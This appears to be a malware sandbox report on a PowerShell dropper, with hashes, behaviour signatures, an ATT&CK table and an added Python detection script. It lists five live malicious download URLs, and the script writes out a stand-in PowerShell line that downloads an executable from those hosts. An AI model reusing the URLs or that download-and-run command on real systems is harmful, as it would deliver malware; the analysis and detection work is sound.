General

  • Target

    02868750016b0cde2fa07620568b246e_JaffaCakes118

  • Size

    202KB

  • Sample

    240427-f4zpxscg9v

  • MD5

    02868750016b0cde2fa07620568b246e

  • SHA1

    242cf0ae87913e8591b9bada7165dc75c0cdc4ea

  • SHA256

    f630ad012c459958ec8f986f9ebf7bb9468bb0734d012e078ef5f240c639a597

  • SHA512

    43ec55d6a24de8bcfdcc9267c45654f85f5fb8db399491f5336333a9960fd202e21965104f894ed39fbb32be00f6d1c4ca759ee32dfc7da8abe4e6818618031a

  • SSDEEP

    3072:Z2y/Gdy5ktGDWLS0HZWD5w8K7Nk9yD7IBUg1r6EOpwg53RF:Z2k4NtGiL3HJk9yD7bgr6Eqwg53RF

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (each tagged exe.dropper: a download location for the next-stage executable)
    http://femminent.com/wp/UqU/
    http://liberty.blvrdev.com/stats/bLH/
    http://milkteaway.azurewebsites.net/calendar/bNmo99828/
    http://nehashetty.xyz/wp-admin/vNWZ/
    http://storeofofficial.shop/pokjbg746ihrtr/3u/

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory
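The three behaviours flagged above (a parent that should not be launching a script host, a script host reaching the network, a file written under System32) and the exe.dropper URL list from the Malware Config section can be reproduced as detection logic. The script below is an added example written for this page; it is not sandbox output and not part of the sample. The Sysmon-style events, the Word parent process, the fallback-loop PowerShell script, the "blocklisted" process set and the dropped-file path are constructed assumptions (the report names neither the parent process nor the dropped file); only the URL list is copied from the report.

```python
# Added example: replay constructed endpoint events through the signature
# checks the report lists, and recover the exe.dropper URLs from an
# -EncodedCommand PowerShell launch. Not sandbox code.
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# URLs taken from the report's extracted config (exe.dropper).
EXTRACTED_URLS = [
    "http://femminent.com/wp/UqU/",
    "http://liberty.blvrdev.com/stats/bLH/",
    "http://milkteaway.azurewebsites.net/calendar/bNmo99828/",
    "http://nehashetty.xyz/wp-admin/vNWZ/",
    "http://storeofofficial.shop/pokjbg746ihrtr/3u/",
]

# Assumption: which parents are "unexpected" for a script host, and which
# images are blocklisted for network requests. The report does not publish
# its own lists.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
SYSTEM32 = "c:\\windows\\system32\\"

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"`,;)\]]+", re.I)

# Constructed stand-in for the deobfuscated script: a fallback loop over the
# listed URLs, which is what a multi-URL exe.dropper config implies. It is not
# the sample's real script and is never executed here.
DROPPER_PS = ("$u=" + ",".join(f"'{u}'" for u in EXTRACTED_URLS) + ";"
              "foreach($x in $u){try{(New-Object Net.WebClient)"
              ".DownloadFile($x,$env:TEMP+'\\a.exe');break}catch{}}")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(text: str) -> List[str]:
    """Unique URLs in first-seen order."""
    seen, out = set(), []
    for u in URL_RE.findall(text):
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out


def defang(url: str) -> str:
    """hxxp://host[.]tld/path form for sharing IOCs without live links."""
    p = urlsplit(url)
    return f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}"


def evaluate(events: List[Dict]) -> List[Dict]:
    """Apply the report's three signatures plus URL recovery, in event order."""
    findings = []
    for ev in events:
        img = basename(ev["image"])
        if ev["type"] == "process_create":
            parent = basename(ev["parent_image"])
            if parent in OFFICE_PARENTS and img in SCRIPT_HOSTS:
                findings.append({"sig": "Process spawned unexpected child process",
                                 "pid": ev["pid"], "detail": f"{parent} -> {img}"})
            script = decode_encoded_command(ev["command_line"])
            urls = extract_urls(script) if script else []
            if urls:
                findings.append({"sig": "Encoded command contains dropper URLs",
                                 "pid": ev["pid"], "urls": urls})
        elif ev["type"] == "network_connect" and img in SCRIPT_HOSTS:
            findings.append({"sig": "Blocklisted process makes network request",
                             "pid": ev["pid"], "detail": f"{img} -> {ev['dest']}"})
        elif ev["type"] == "file_create" and ev["target"].lower().startswith(SYSTEM32):
            findings.append({"sig": "Drops file in System32 directory",
                             "pid": ev["pid"], "detail": ev["target"]})
    return findings


def constructed_events() -> List[Dict]:
    """Sysmon-style events (constructed; parent process and dropped file are assumed)."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    word = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    enc = base64.b64encode(DROPPER_PS.encode("utf-16-le")).decode()
    return [
        {"type": "process_create", "pid": 1200, "image": word,
         "parent_image": r"C:\Windows\explorer.exe", "command_line": '"WINWORD.EXE" /n doc1.doc'},
        {"type": "process_create", "pid": 1300, "image": ps, "parent_image": word,
         "command_line": f"powershell.exe -w hidden -enc {enc}"},
        {"type": "network_connect", "pid": 1300, "image": ps, "dest": "femminent.com:80"},
        {"type": "file_create", "pid": 1300, "image": ps, "target": r"C:\Windows\System32\svc.exe"},
    ]


if __name__ == "__main__":
    for f in evaluate(constructed_events()):
        print(f["sig"], "|", f.get("detail") or [defang(u) for u in f["urls"]])
```

Running the block prints one line per signature hit; the URL finding is printed defanged so the list can be pasted into a ticket or blocklist without creating live links. The -EncodedCommand decode matters because the URLs in the report were only visible after deobfuscation: a rule that matches on raw command-line strings would miss them.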

MITRE ATT&CK Matrix (ATT&CK v13)

  Tactic            Technique                      Hits  ID
  Defense Evasion   Modify Registry                1     T1112
  Discovery         Query Registry                 2     T1012
  Discovery         System Information Discovery   2     T1082
